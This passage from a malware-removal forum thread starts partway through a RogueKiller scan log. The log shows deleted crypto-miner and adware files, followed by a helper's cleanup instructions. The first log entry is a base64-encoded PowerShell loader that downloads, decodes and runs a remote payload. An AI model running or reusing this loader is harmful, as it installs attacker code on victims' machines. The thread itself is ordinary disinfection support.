ADEANABuADMARABWAGsAbgBzAEwAMABQAG0ARgBGAEQATwBWAGUAMQA5AFoAegBNAE4AeQBSAFgARgBCAEwAcQBpADUAeQBvAFMAXwBRAFoAMABRAEkAUgBNADUAOQB2ADcAWgBIAFQAcgBVAEIAbwB5AHQASQB4ADkAdABmAEUAUAB6ADYAZQBZAF8AYQBfAFkAdABDAC0AYgBxAHAAUgBIAGEAWgBJAFEALQBqAG0AagBPAEoAaQBzAFMAYQBaAEkAZQBnADUAMAAzAEQAeABnAGQAZABoAFAATwBFAHkAagA2AGYASgBhAFQAQgA0AEYAawBrADYAdwBJAEgAdgBmAG0ARQBBAEsAUABlAE8AbQBxAF8ARwAzAFoANwBMADUAdwBZAEsAQQB6AFEAZwBuADQAbwBEAE8ANABTAGgAawBLAHkAMwBNADUARAA1AG0AOABrAGwAUQB2AGIAUwBMADcAVQBVAGMAeQBlADgAdABSAFUAUwB2AG8AYgBMAEwAOQBaAEwANQA4AHgAagBPAEEAQwBlAHAAVgBEAFYAbgBaAGsAUQAyAHAARABPAE0AMQA4AHcATABmAGUAYQBtAHIARABEAFkASwB2AHYASABhAGoATwBiAGcASQBCAG4AOQA5AFUASgA4AHYASABiAEoAbAB6AGcAdgA3AEwAagA1ADgASQBLAFEAcQBBAEoATwBNAHoAdwAzADEAUQBZAFIASAAtAFoASQBNAHoAagBCAEsAVgA0AEYAOQBRAFYAcABOAHcATQBCADMAMwByAHYANwA5AGQAWQBkAHYAQgB6AHkAUwAzAEQAUQA3AEsAbgAxAGYAbwBLAFMAMgBLAFcATgBzAFkAegBsADIAZwBKADgASAB1AEwATwBDADgANgBDADMATABXAHMAVgBDAHMAYQBoAFYAaABhAHYARABIAE0AbwBjAEoAcgBfAGkAWQBYAHcAcABGAHAALQA2AGcAQQBQAFgAcgBjAEIAUwBkAFAAYQB3AEYAcwBEAHAAVQBJAEUAUAB4AGgAagBIAEkAbABoAHIAVwBMAFcAOQA1AGcAVgBLAEkAawA3AGYAMAAtAEkAVQB1AGEAdABDADkAWgBZAEcATQBfAFcAOQBFAGQAUwAtAC0ARgBKADYAQQBLADkAcQBKAEQAaQBIAHcAUgBFAG8AawBEAFAAUgBGADAARQBqAGEAdQB3AFYALQBGAHkAOQBhAEwAYgA0AEcAWQBuAE8ARQBvAG4AaQBqAE4AeQBkAGYAcgBUAEUATABZAGgASQBWAFkAMwB5AE0ASwBEAE0AUgBlAGMAeQA2AEwAdwAzAEMAawBoAEIAagBaAFYAQQB2AEEAYQAxAFEAcQBkAEkAZQBJAFQAVABoAE4ANAB0ADcARwBSADMARABhAHkANQBYAEgAMgB3AGoAcABqAEkAdwBBAEYALQB1ADAAdABKADQASQA3AEQAcgB2AGMAUAA3AEUATABaAGoAZAAzADkAaQA4AE0AZwBQAEcAcwBtAG0AMAA2AFIAdgBhAGgARwBjAGkAXwBOADcAdwBmAG4ATgB0AHMASwBfAE4AWgBZADYAZgBTAFQALQBXAEsARABWAGUARgBSADIAeABiAFoAcAA5ACYAYwA9ADgAQQB6AEoATQB1AFEAQQBTADQAQQA1AG4ATgBPAFUAdQBzAF8ASABqAGwAMABCAG8AUwByAEEAZAAxAGoAZgBYADcAegBoAGMAMQBkAG4ANgBqAFIAaAA4AFoAdABWAGUAcgBwAHcAcgBZAEIAbAB6AEMARABHAEkAbgBuAFEAVgBUAEUAQgBnAGwATQBTAEoASwBfAE8AOABMAGIAdAA1AEsAeABwAHQAVQBnAFIAdQBwAE4ARQBaAFMAawBBAGEAcQBCAHcANAByAGwASgBNAHkARABEAEoAYQBMAFkASABQADUAYgBkAHgAagA4AG0AdwBmAHgAegBvAE0ARAB4AEsAZgBTAGQASABhAFIAYQAzAEYAWgBKADgAcgA3ADkASwBHAHMAXwA5AHIATQAyAEUATwBCADMARABjAFQAYQB5AFoAUgBDAFcANwBZAGcAaABkADQAMAAxADgAMgBkAFcARQBnAHEAaQBTAEsASgByAGUAZAAyADkAVQB3AFkAbgByADUAWABWAFgAbwAzAE8ASQBVAHUANAB5ADMAagB2AGIANAB5AEIAeQBnAFkAcgBkAEIAcwBPAFgAQgBZAGoAawBEAGUAZgBFAEEAdQBlADMAOQB1AHQASwBsAC0AMgBkAEoAegBWADYATABHAEkAbABvADYAUABKAGYATwB3AEIAUgBhAHMAbwBkAHIARQB5AHUATABIAE8ASgBaADQAcQBsAGYAbABwAFMAawB2AGMATgBVADgAWgA3AHUANwBBAG4AcQBlADEATgAwAHgAZQBIAGsAMgBvADkAWgByADUALQBKAHIAMQBXAEcAeQA0ADkAUwB3AEoAUQBzAEQAdABfAHUAYQBFADgAUABWAEEAYwBXAHkAVgAwAF8AdgB0AGIAWABkADkAZgB3AHYATgBSADkASgBYAHUAVwByADgATQB5AHoASQBvAHUASwBMAEoAaQA1AHgAVwBCADYAbQBtAE8AWgBxADEASABBAE0AUABzAEwAdABEAFIAZABoADUANQBEAGYAMwBxAE4AZgBIADgARQBCAE4ASwBuAFgARwBGAGQAOABNAFIATQBJAEwAMQBRAEkAYQBsAGUAaAB1AC0AZQBoAGsAVQB6AEgAOABZADYAUQB4AHcATgAwAEoAMABJAEoASQBQAGIAUABHAHcAVgByAHQAUABIAHcAdwBfAHYAbgBxAEkAVgBzAFoASgBiAGcAOQBCADYAYwBMAE4AagA4AEEARAA0AHQAQwBRADUAdQBkAEQAbQBPADgAaQBCAGUAYgBZAHIARABUADYAagBOAHUAbwBIAGUATgBrAG8AUQBqAFcAbQBtAGIAOAA2AFQAdABqAHkAWgAxAGsAdwBpAEwANwBRAEUAaQB6ADEATAA4AHkANQBWAFYAOQBHAHIASgB4AFAAMwBvAE8AdwBUAHgAVwBpAG8AbAA0AEUAcAAtAFMAYwBtAGMAWABoAGkAVwB4AEwAagBMADYARABZAHMAQwBYADEARwBmAFMANgBZAFEAZAB0AFkAVABzAG4AWQA3AFQATABFADEAQgBnAGgAVQBYAGIAVQAzADkAQwA0AGoAMwB2ADcASQB6ADcAYgAxAF8ARABaAHYAVABiAEMARQB4AEQAegA5AEMANQBWADYAUQAzAEsALQBVAG8ASgAxAHEAcABOAFUASgBXAGsANQByAHYATwBNAEwAVABhAHoAaABtAF8AMgBJAHgAVwB2AEEARQA4AG8AbgB1ADAAMgBtAHMAZgBuAFYAZQBvAGUAQgBHAGQAdwBzAEkARQBPADYAMwBqAG8ARQBhAF8ASABlAEIAWQBHAGoAcgBpAG8AWQAwAF8AMAA2AE8AeABMADQARQBWAHUAdwAtADMAQgBtAEQAcABNAHMAVgA0AHIAOQB5ADAAbQBPADEAZwBGAHUALQByAEsAYgBhAHUAWgBaAEsAZwA5AEEAVQB0AGYAQwBaAFMAVwAtAHcAcAA5AGgAaQBwAGIAYgBKAHIAcgBqAGQAVwB3AE4AZABsAGgAZgBWADAAMQBCAE4AUgBLAFcAdgBBAFIAbgAwAC0AUQBoAHcAeABHAGQAUgAtAFkARQAxAEIAVAByADIAQQB5ADIAWQBZAEIATwBuAEMAUwBGAGoAawBkADIAawBWADYAVQBBAHAARwBQADAAeQBXADYAOQBmAF8AaAAxAFYAJgByAD0ANwAyADMAOQAwADIANgAyADcANQAzADcANwA1ADkANQAwADgANwAiADsAJABzAHQAcwBrAD0AIgB7ADcAOQA3AEUAMAA5ADQANwAtADAARQA3AEUALQAwAEYAMABGAC0ANwA5ADEAMQAtADAARQAwAEMANwBBADAANQAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFYAMQBSAE8AVQBUAFUAUwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAKAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAOwB9AAoAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AAoAfQAKAGYAdQBuAGMAdABpAG8AbgAgAEEARgBPAFUAQwBTAEkAQwBDAEoAQQBaAEIAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7ADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAEsAVwBMAFYAQwBVAEYAUgBBAFcAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAfQAKACQAcwBjAD0ASwBXAEwAVgBDAFUARgBSAEEAVwBDACgAQQBGAE8AVQBDAFMASQBDAEMASgBBAFoAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AAoAfQA7AGUAeABpAHQAIAAwADsA) -> Deleted

¤¤¤ Files : 3 ¤¤¤
[BitMiner.Gen0][File] C:\Applications\Service.exe -> Deleted
[BitMiner.Gen0][Folder] C:\Users\BOSS TSAPO\AppData\Local\minergate -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\.lock -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\instmonsttest@gmail.com.achievements -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\log\minergate.log -> Deleted
[BitMiner.Gen0][Folder] C:\Users\BOSS TSAPO\AppData\Local\minergate\log -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\miners.ini -> Deleted
[BitMiner.Gen0][File] C:\Users\BOSS TSAPO\AppData\Local\minergate\pools.config -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\PCKAVShellExt64.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\ServiceInfrastructure.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedNativeLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\SharedNativeLibraryPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\zeoscanner.inf -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKAV\zeoscanner.sys -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware\PCKAV -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\AntiTheftServiceLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\AppRemFolder.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Contracts.Account.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Contracts.PCKeeper.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Controls.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\CrashReportSender.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DiskCleanerComponent.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DiskCleanerComponentPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\DrvInstaller.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Elevator.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\fileHiders.inf -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\fileHiders.sys -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Ionic.Zip.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\LocalizationHelpers.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\ManagedWifi.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Microsoft.Expression.Drawing.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Microsoft.Expression.Interactions.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\NativeMethods.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Newtonsoft.Json.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\Ninject.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\NLog.config -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\NLog.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\OcfElevator.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\OneClickFixServiceLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\OneClickFixServicePS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeper.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeper.Shared.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeperCore.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeperServiceCore.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeperServicePS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeperShellExt32.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKeeperShellExt64.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKElevatedHost.exe -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKObjFactory.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\PCKObjFactoryPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\RegistryCleanerComponent.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\RegistryCleanerComponentPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\ServiceInfrastructure.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\SharedLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\SharedNativeLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\SharedNativeLibraryPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\SQLite.Interop.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\System.Data.SQLite.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\System.Windows.Interactivity.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\SystemContextMenu.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\TokenPrivileges.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\UtilitiesServiceLibrary.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\WebCamFrameCaptureComponent.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\WebCamFrameCaptureComponentPS.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\ZBAnalytics.dll -> Deleted
[PUP.Essentware|PUP.Gen1][File] C:\Program Files\Essentware\PCKeeper\ZBAnalyticsCore.dll -> Deleted
[PUP.Essentware|PUP.Gen1][Folder] C:\Program Files\Essentware\PCKeeper -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 4 ¤¤¤
[PUP.Gen0][Chrome:Addon] Default : MSN Homepage & Bing Search Engine [fcfenmboojpjinhpgggodefccipikbpd] -> Not selected
[PUM.SearchEngine][Firefox:Config] 2gwlwnaw.default : user_pref("browser.search.selectedEngine", "Yahoo®"); -> Not selected
[PUM.SearchEngine][Firefox:Config] 2gwlwnaw.default : user_pref("browser.search.defaultenginename", "Yahoo®"); -> Not selected
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [http://www%2Cgoogle.com/] -> Not selected

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 3cda26c2238fcab331261890c96be489
[BSP] 4a20a10860d8ae721877a3165e776450 : Empty|VT.Unknown MBR Code
Partition table:
0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 260 MB
1 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 534528 | Size: 16 MB
2 - Basic data partition | Offset (sectors): 567296 | Size: 908252 MB
3 - Basic data partition | Offset (sectors): 1860667392 | Size: 25600 MB
4 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1913096192 | Size: 1000 MB
5 - Basic data partition | Offset (sectors): 1915144192 | Size: 17740 MB
6 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1951475712 | Size: 1000 MB
User = LL1 ... OK
User = LL2 ... OK



this one seems to have solved the problem because the openwith.exe  disappeared as soon as i deleted the infected files...  Thank you so much Kelvin .

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #12 on: November 20, 2017, 10:23:12 AM »
You`re very welcome feelityd08, continue as follows to clean up...

Delete RogueKiller portable from your Downloads folder, also delete this folder: C:\ProgramData\RogueKiller

Next,

Download "Delfix by Xplode" and save it to your desktop.

Or use the following if first link is down:

"Delfix link mirror"

If your security program alerts to Delfix either, accept the alert or turn your security off.

Double Click to start the program. If you are using Vista or higher, please right-click and choose run as administrator

Make Sure the following items are checked:


  • Remove disinfection tools <----- this will remove tools we may have used.
  • Purge System Restore <--- this will remove all previous and possibly exploited restore points, a new point relative to system status at present will be created.
  • Reset system settings   <--- this will reset any system settings back to default that were changed either by us during cleansing or malware/infection

Now click on "Run" and wait patiently until the tool has completed.

The tool will create a log when it has completed. We don't need you to post this.

Any remnant files/logs from tools we have used can be deleted…

Next,

Read the following links to fully understand PC Security and Best Practices, you may find them useful....

Answers to Common Security Questions and best Practices

Do I need a Registry Cleaner?

Take care and surf safe

Kevin... 

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #13 on: November 20, 2017, 10:36:51 AM »
its done Kelvin Thnk you so much you are a life saver

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #14 on: November 20, 2017, 12:52:56 PM »
You`re very welcome feelityd08, feel free to comeback anytime....

Regards,

Kevin.... :t